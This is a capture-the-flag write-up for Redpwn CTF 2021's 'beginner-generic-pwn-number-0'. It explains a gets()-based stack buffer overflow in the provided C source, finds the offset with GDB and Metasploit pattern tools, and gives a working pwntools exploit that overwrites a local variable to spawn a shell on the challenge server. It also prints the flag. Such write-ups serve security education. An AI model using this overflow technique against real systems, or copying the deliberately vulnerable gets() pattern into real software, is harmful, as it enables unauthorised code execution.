## beginner-generic-pwn-number-0

* **CTF:** Redpwn CTF 2021
* **Category:** pwn
* **Points:** 105
* **Author(s):** b0uldrr
* **Date:** 10/07/21

---

### Challenge
```
rob keeps making me write beginner pwn! I'll show him...
nc mc.ax 31199
```

### Downloads
* [beginner-generic-pwn-number-0](beginner-generic-pwn-number-0)
* [beginner-generic-pwn-number-0.c](beginner-generic-pwn-number-0.c)

---

### Solution

Here is the provided source in `beginner-generic-pwn-number-0.c`. It is vulnerable to a buffer overflow through the `gets(heartfelt_message);` call which doesn't check for input size. If we change the `inspiration_message_index` variable value to `-1` then the program will spawn a shell. Lucikly `inspirational_message_index` is declared earlier than `heartfelt_message` (which we will overflow), so it is higher on the stack and under our control:
```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>


const char *inspirational_messages[] = {
  "\"𝘭𝘦𝘵𝘴 𝘣𝘳𝘦𝘢𝘬 𝘵𝘩𝘦 𝘵𝘳𝘢𝘥𝘪𝘵𝘪𝘰𝘯 𝘰𝘧 𝘭𝘢𝘴𝘵 𝘮𝘪𝘯𝘶𝘵𝘦 𝘤𝘩𝘢𝘭𝘭 𝘸𝘳𝘪𝘵𝘪𝘯𝘨\"",
  "\"𝘱𝘭𝘦𝘢𝘴𝘦 𝘸𝘳𝘪𝘵𝘦 𝘢 𝘱𝘸𝘯 𝘴𝘰𝘮𝘦𝘵𝘪𝘮𝘦 𝘵𝘩𝘪𝘴 𝘸𝘦𝘦𝘬\"",
  "\"𝘮𝘰𝘳𝘦 𝘵𝘩𝘢𝘯 1 𝘸𝘦𝘦𝘬 𝘣𝘦𝘧𝘰𝘳𝘦 𝘵𝘩𝘦 𝘤𝘰𝘮𝘱𝘦𝘵𝘪𝘵𝘪𝘰𝘯\"",
};

int main(void)
{
  srand(time(0));
  long inspirational_message_index = rand() % (sizeof(inspirational_messages) / sizeof(char *));
  char heartfelt_message[32];
  
  setbuf(stdout, NULL);
  setbuf(stdin, NULL);
  setbuf(stderr, NULL);

  puts(inspirational_messages[inspirational_message_index]);
  puts("rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!");
  puts("can you write me a heartfelt message to cheer me up? :(");

  gets(heartfelt_message);

  if(inspirational_message_index == -1) {
    system("/bin/sh");
  }
}
```

We can see that the compiled program is a 64-bit ELF:
```
$ file beginner-generic-pwn-number-0
beginner-generic-pwn-number-0: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=954a4064a32902a83a98f211211c5eafdef2b3c0, for GNU/Linux 3.2.0, not stripped
```

Create an overflow pattern:
```
$ msf-pattern_create -l 100 > pattern.txt
```

Open the vulnerable binary in GDB:
```
$ gdb beginner-generic-pwn-number-0
```

Within GDB, run the program using pattern.txt as the input:
```
gdb-peda$ run < pattern.txt
```

We get a segfault because we've overflow the return address with our input. Check the value of the stack pointer:
```
gdb-peda$ x/wx $rsp
0x7fffffffdf18: 0x39624138
```

Back in our shell, we check the value of the stack pointer and find an offset match at 56 bytes. This is the number of bytes we need to write before we get to the start of the RETURN ADDRESS on the stack. 
```
$ msf-pattern_offset -q 0x39624138
[*] Exact match at offset 56
```

We only want to overwrite the `inspirational_message_index` variable, which is 32 bytes above the `heartfelt_message` variable (or 16 bytes below the return address):  

```
STACK HIGHER ADDRESSES
...
---------------------------------------
 8 bytes - RETURN ADDRESS
---------------------------------------
 8 bytes - SAVED BASE POINTER
---------------------------------------
 8 bytes - INSPIRATIONAL_MESSAGE_INDEX
---------------------------------------
32 bytes - HEARTFELT_MESSAGE
---------------------------------------
...
STACK LOWER ADDRESSES
```

We're going to overwrite it with a signed 64 bit integer -1, which is 0xFFFFFFFFFFFFFFFF.

My complete solution:
```python
#!/usr/bin/python3
import pwn

local = False
if local:
    conn = pwn.process('./beginner-generic-pwn-number-0')
else:
    conn = pwn.remote('mc.ax', 31199)
    
conn.recvuntil('can you write me a heartfelt message to cheer me up? :(')

buf  = b'a' * (56-8-8)                # return address overflow - rbp (8 bytes) - 8 bytes for local var
buf += pwn.p64(0xFFFFFFFFFFFFFFFF)   # -1 in 64-bit signed integer format

conn.sendline(buf)
conn.interactive()
```

Running it, we get get a shell and find the flag in `flag.txt`:
```
$ ./soln.py  
[+] Opening connection to mc.ax on port 31199: Done
[*] Switching to interactive mode

$ ls
flag.txt
run
$ cat flag.txt
flag{im-feeling-a-lot-better-but-rob-still-doesnt-pay-me}
```
---

### Flag 
```
flag{im-feeling-a-lot-better-but-rob-still-doesnt-pay-me}
```
